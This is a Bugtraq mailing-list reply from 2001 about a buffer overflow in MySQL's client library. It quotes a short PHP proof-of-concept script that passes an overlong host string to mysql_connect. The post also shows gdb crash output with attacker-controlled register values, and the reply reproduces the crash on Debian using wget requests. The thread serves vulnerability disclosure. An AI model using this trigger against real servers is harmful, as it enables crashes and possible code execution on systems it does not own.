Bugtraq mailing list archives
Re: Some more MySql security issues
From: "Hector A.Paterno" <apmailing () FIBERTEL COM AR>
Date: Mon, 12 Feb 2001 17:20:00 -0300
On Monday 12 February 2001 18:22, you wrote:
----- Original Message ----- From: "Joao Gouveia" <tharbad () KAOTIK ORG> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Friday, February 09, 2001 9:54 PM Subject: Some more MySql security issuesHi, MySql staff has been notified regarding this issues on 2001-01-26. There still are some potential security flaws with MySql lastest stable release. Follows some tests i've made all with: MySql v3.23.32 PHP v4.0.4pl1 (static) apache-1.3.14 Let's look at a pratical example: A simple php script: <? for ( $i=0 ; $i<= $buffer-1 ; ++$i ) $host.="A"; $cid = mysql_connect($host,$usr,$pwd); ?> Let's run apache ( latest version compiled with latest version of PHP ) in debugging mode to see what hapens: <quote> spike:~ # gdb /www/bin/httpd ... (gdb) run -X Starting program: /www/bin/httpd -X </quote> On our browser we issue: test.php?buffer=120 gdb shows the following <quote> Program received signal SIGSEGV, Segmentation fault. 0x40030cf3 in mysql_real_connect () from /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10 (gdb) bt #0 0x40030cf3 in mysql_real_connect () from /home/jroberto/httpd/mysql/lib/mysql/libmysqlclient.so.10 #1 0x41414141 in ?? () (gdb) inf reg eax 0x82010c0 136319168 ecx 0x3 3 edx 0x82010f4 136319220 ebx 0x40046324 1074029348 esp 0xbfffdc30 0xbfffdc30 ebp 0xbfffdfbc 0xbfffdfbc esi 0x8204ba5 136334245 edi 0x41414141 1094795585 eip 0x40030cf3 0x40030cf3 eflags 0x10203 66051 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) </quote>
Lets try this problem : Secenario : Debian Woody. mysql Ver 11.11 Distrib Mysql 3.23.31 Apache 1.3.14 php 4.0.4pl1 StuffBox:/usr/sbin# gdb apache GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you a welcome to change it and/or distribute copies of it under certain conditio Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details This GDB was configured as "i686-pc-linux-gnu"... (no debugging symbols found)... (gdb) run -X Starting program: /usr/sbin/apache -X [..] On the other machine I wirte this script : <? for ( $i=0 ; $i<= $buffer-1 ; ++$i ) $host.="A"; $cid = mysql_connect($host,$usr,$pwd); ?> and uploaded to my public_html in StuffBox ( The Box That is running apache + mysql + php ). and test from other site some buffers lengths : 200: PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=200 StuffBox : Program received signal SIGSEGV, Segmentation fault. 0x40182e9d in inet_aton () from /lib/libc.so.6 (gdb) (gdb) bt #0 0x40182e9d in inet_aton () from /lib/libc.so.6 #1 0x40182e52 in inet_addr () from /lib/libc.so.6 #2 0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10 (gdb) inf reg eax 0x401ba160 1075552608 ecx 0x0 0 edx 0x2 2 ebx 0x401b9474 1075549300 esp 0xbfffe27c 0xbfffe27c ebp 0xbfffe2b4 0xbfffe2b4 esi 0x61697620 1634301472 edi 0x6 6 eip 0x40182e9d 0x40182e9d 500 : PlayBox:~# wget http://192.168.1.2/~dn/bof.php3?buffer=500 rogram received signal SIGSEGV, Segmentation fault. 0x40182e9d in inet_aton () from /lib/libc.so.6 (gdb) (gdb) bt #0 0x40182e9d in inet_aton () from /lib/libc.so.6 #1 0x40182e52 in inet_addr () from /lib/libc.so.6 #2 0x4026a48f in mysql_real_connect () from /usr/lib/libmysqlclient.so.10 (gdb) inf reg eax 0x401ba160 1075552608 ecx 0x0 0 edx 0x2 2 ebx 0x401b9474 1075549300 esp 0xbfffe27c 0xbfffe27c ebp 0xbfffe2b4 0xbfffe2b4 esi 0x41414141 1094795585 <<= edi 0x6 6 eip 0x40182e9d 0x40182e9d Cya.
Current thread:
- Some more MySql security issues Joao Gouveia (Feb 10)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Tim Yardley (Feb 12)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Joao Gouveia (Feb 13)
- Re: Some more MySql security issues Tim Yardley (Feb 13)
- Re: Some more MySql security issues Tim Yardley (Feb 12)
- Re: Some more MySql security issues Peter van Dijk (Feb 12)
- Re: Some more MySql security issues Carsten H. Pedersen (Feb 12)
- Re: Some more MySql security issues Konrad Rieck (Feb 12)
- Re: Some more MySql security issues Theodor Milkov (Feb 12)
- <Possible follow-ups>
- Re: Some more MySql security issues Hector A.Paterno (Feb 13)